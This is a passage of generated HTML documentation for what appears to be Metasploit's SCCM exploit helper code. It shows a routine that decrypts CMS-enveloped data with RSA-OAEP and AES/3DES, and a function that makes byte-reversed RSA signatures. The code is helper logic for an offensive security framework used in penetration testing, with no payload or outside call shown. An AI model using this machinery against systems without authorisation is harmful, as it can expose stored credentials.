<span class='kw'>elsif</span> <span class='id identifier rubyid_key_encryption_alg'>key_encryption_alg</span> <span class='op'>==</span> <span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1.html" title="Rex::Proto::CryptoAsn1 (module)">CryptoAsn1</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html" title="Rex::Proto::CryptoAsn1::OIDs (class)">OIDs</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html#OID_RSAES_OAEP-constant" title="Rex::Proto::CryptoAsn1::OIDs::OID_RSAES_OAEP (constant)">OID_RSAES_OAEP</a></span></span><span class='period'>.</span><span class='id identifier rubyid_value'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html#value-class_method" title="Rex::Proto::CryptoAsn1::OIDs.value (method)">value</a></span></span>
<span class='id identifier rubyid_decrypted_key'>decrypted_key</span> <span class='op'>=</span> <span class='id identifier rubyid_key'>key</span><span class='period'>.</span><span class='id identifier rubyid_private_decrypt'>private_decrypt</span><span class='lparen'>(</span><span class='id identifier rubyid_encrypted_rsa_key'>encrypted_rsa_key</span><span class='comma'>,</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>PKey</span><span class='op'>::</span><span class='const'>RSA</span><span class='op'>::</span><span class='const'>PKCS1_OAEP_PADDING</span><span class='rparen'>)</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">UnexpectedReply</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Key encryption routine is currently unsupported: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_key_encryption_alg'>key_encryption_alg</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_cea'>cea</span> <span class='op'>=</span> <span class='id identifier rubyid_cms_envelope'>cms_envelope</span><span class='lbracket'>[</span><span class='symbol'>:encrypted_content_info</span><span class='rbracket'>]</span><span class='lbracket'>[</span><span class='symbol'>:content_encryption_algorithm</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_algorithms'>algorithms</span> <span class='op'>=</span> <span class='lbrace'>{</span>
<span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1.html" title="Rex::Proto::CryptoAsn1 (module)">CryptoAsn1</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html" title="Rex::Proto::CryptoAsn1::OIDs (class)">OIDs</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html#OID_AES256_CBC-constant" title="Rex::Proto::CryptoAsn1::OIDs::OID_AES256_CBC (constant)">OID_AES256_CBC</a></span></span><span class='period'>.</span><span class='id identifier rubyid_value'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html#value-class_method" title="Rex::Proto::CryptoAsn1::OIDs.value (method)">value</a></span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span> <span class='label'>iv_length:</span> <span class='int'>16</span><span class='comma'>,</span> <span class='label'>key_length:</span> <span class='int'>32</span><span class='comma'>,</span> <span class='label'>cipher_name:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>aes-256-cbc</span><span class='tstring_end'>&#39;</span></span> <span class='rbrace'>}</span><span class='comma'>,</span>
<span class='const'><span class='object_link'><a href="../../../../Rex.html" title="Rex (module)">Rex</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto.html" title="Rex::Proto (module)">Proto</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1.html" title="Rex::Proto::CryptoAsn1 (module)">CryptoAsn1</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html" title="Rex::Proto::CryptoAsn1::OIDs (class)">OIDs</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html#OID_DES_EDE3_CBC-constant" title="Rex::Proto::CryptoAsn1::OIDs::OID_DES_EDE3_CBC (constant)">OID_DES_EDE3_CBC</a></span></span><span class='period'>.</span><span class='id identifier rubyid_value'><span class='object_link'><a href="../../../../Rex/Proto/CryptoAsn1/OIDs.html#value-class_method" title="Rex::Proto::CryptoAsn1::OIDs.value (method)">value</a></span></span> <span class='op'>=&gt;</span> <span class='lbrace'>{</span> <span class='label'>iv_length:</span> <span class='int'>8</span><span class='comma'>,</span> <span class='label'>key_length:</span> <span class='int'>24</span><span class='comma'>,</span> <span class='label'>cipher_name:</span> <span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>des-ede3-cbc</span><span class='tstring_end'>&#39;</span></span> <span class='rbrace'>}</span>
<span class='rbrace'>}</span>
<span class='kw'>if</span> <span class='id identifier rubyid_algorithms'>algorithms</span><span class='period'>.</span><span class='id identifier rubyid_include?'>include?</span><span class='lparen'>(</span><span class='id identifier rubyid_cea'>cea</span><span class='lbracket'>[</span><span class='symbol'>:algorithm</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='rparen'>)</span>
<span class='id identifier rubyid_alg_hash'>alg_hash</span> <span class='op'>=</span> <span class='id identifier rubyid_algorithms'>algorithms</span><span class='lbracket'>[</span><span class='id identifier rubyid_cea'>cea</span><span class='lbracket'>[</span><span class='symbol'>:algorithm</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='rbracket'>]</span>
<span class='kw'>if</span> <span class='id identifier rubyid_decrypted_key'>decrypted_key</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>!=</span> <span class='id identifier rubyid_alg_hash'>alg_hash</span><span class='lbracket'>[</span><span class='symbol'>:key_length</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">UnexpectedReply</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Bad key length: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_decrypted_key'>decrypted_key</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_iv'>iv</span> <span class='op'>=</span> <span class='const'>RASN1</span><span class='op'>::</span><span class='const'>Types</span><span class='op'>::</span><span class='const'>OctetString</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span>
<span class='id identifier rubyid_iv'>iv</span><span class='period'>.</span><span class='id identifier rubyid_parse!'>parse!</span><span class='lparen'>(</span><span class='id identifier rubyid_cea'>cea</span><span class='lbracket'>[</span><span class='symbol'>:parameters</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='rparen'>)</span>
<span class='kw'>if</span> <span class='id identifier rubyid_iv'>iv</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span> <span class='op'>!=</span> <span class='id identifier rubyid_alg_hash'>alg_hash</span><span class='lbracket'>[</span><span class='symbol'>:iv_length</span><span class='rbracket'>]</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">UnexpectedReply</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Bad IV length: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_iv'>iv</span><span class='period'>.</span><span class='id identifier rubyid_length'>length</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_cipher'>cipher</span> <span class='op'>=</span> <span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>Cipher</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='id identifier rubyid_alg_hash'>alg_hash</span><span class='lbracket'>[</span><span class='symbol'>:cipher_name</span><span class='rbracket'>]</span><span class='rparen'>)</span>
<span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_decrypt'>decrypt</span>
<span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_key'>key</span> <span class='op'>=</span> <span class='id identifier rubyid_decrypted_key'>decrypted_key</span>
<span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_iv'>iv</span> <span class='op'>=</span> <span class='id identifier rubyid_iv'>iv</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span>
<span class='id identifier rubyid_decrypted'>decrypted</span> <span class='op'>=</span> <span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_update'>update</span><span class='lparen'>(</span><span class='id identifier rubyid_body'>body</span><span class='rparen'>)</span> <span class='op'>+</span> <span class='id identifier rubyid_cipher'>cipher</span><span class='period'>.</span><span class='id identifier rubyid_final'>final</span>
<span class='kw'>else</span>
<span class='id identifier rubyid_fail_with'>fail_with</span><span class='lparen'>(</span><span class='const'><span class='object_link'><a href="../../../../Msf.html" title="Msf (module)">Msf</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module.html" title="Msf::Module (class)">Module</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html" title="Msf::Module::Failure (module)">Failure</a></span></span><span class='op'>::</span><span class='const'><span class='object_link'><a href="../../../Module/Failure.html#UnexpectedReply-constant" title="Msf::Module::Failure::UnexpectedReply (constant)">UnexpectedReply</a></span></span><span class='comma'>,</span> <span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>Decryption routine is currently unsupported: </span><span class='embexpr_beg'>#{</span><span class='id identifier rubyid_cea'>cea</span><span class='lbracket'>[</span><span class='symbol'>:algorithm</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_value'>value</span><span class='embexpr_end'>}</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span>
<span class='id identifier rubyid_decrypted'>decrypted</span><span class='period'>.</span><span class='id identifier rubyid_force_encoding'>force_encoding</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-16le</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_encode'>encode</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>utf-8</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='period'>.</span><span class='id identifier rubyid_delete_suffix'>delete_suffix</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&quot;</span><span class='tstring_content'>\x00</span><span class='tstring_end'>&quot;</span></span><span class='rparen'>)</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
<div class="method_details ">
<h3 class="signature " id="rsa_sign-instance_method">
#<strong>rsa_sign</strong>(key, data) &#x21d2; <tt>Object</tt>
</h3><div class="docstring">
<div class="discussion">
<p>Sign the data using the RSA key, then reverse the bytes of the resulting signature (strange, but it's what's required)</p>
</div>
</div>
<div class="tags">
</div><table class="source_code">
<tr>
<td>
<pre class="code"><span class="info file"># File 'lib/msf/core/exploit/remote/http/sccm.rb', line 252</span>
<!-- rsa_sign(key, data): signs data with key using an OpenSSL SHA256 digest, reverses the signature bytes in place, and returns them as a single upper-case hex string. -->
<!-- NOTE(review): key is presumably an OpenSSL::PKey::RSA that holds the private half; confirm against callers. The listing does not show why the byte reversal is needed; the docstring only says it is required. -->
<span class='kw'>def</span> <span class='id identifier rubyid_rsa_sign'>rsa_sign</span><span class='lparen'>(</span><span class='id identifier rubyid_key'>key</span><span class='comma'>,</span> <span class='id identifier rubyid_data'>data</span><span class='rparen'>)</span>
<span class='id identifier rubyid_signature'>signature</span> <span class='op'>=</span> <span class='id identifier rubyid_key'>key</span><span class='period'>.</span><span class='id identifier rubyid_sign'>sign</span><span class='lparen'>(</span><span class='const'>OpenSSL</span><span class='op'>::</span><span class='const'>Digest</span><span class='period'>.</span><span class='id identifier rubyid_new'>new</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>SHA256</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='comma'>,</span> <span class='id identifier rubyid_data'>data</span><span class='rparen'>)</span>
<span class='id identifier rubyid_signature'>signature</span><span class='period'>.</span><span class='id identifier rubyid_reverse!'>reverse!</span>
<span class='id identifier rubyid_signature'>signature</span><span class='period'>.</span><span class='id identifier rubyid_unpack'>unpack</span><span class='lparen'>(</span><span class='tstring'><span class='tstring_beg'>&#39;</span><span class='tstring_content'>H*</span><span class='tstring_end'>&#39;</span></span><span class='rparen'>)</span><span class='lbracket'>[</span><span class='int'>0</span><span class='rbracket'>]</span><span class='period'>.</span><span class='id identifier rubyid_upcase'>upcase</span>
<span class='kw'>end</span></pre>
</td>
</tr>
</table>
</div>
</div>
</div>
</div>
</body>
</html>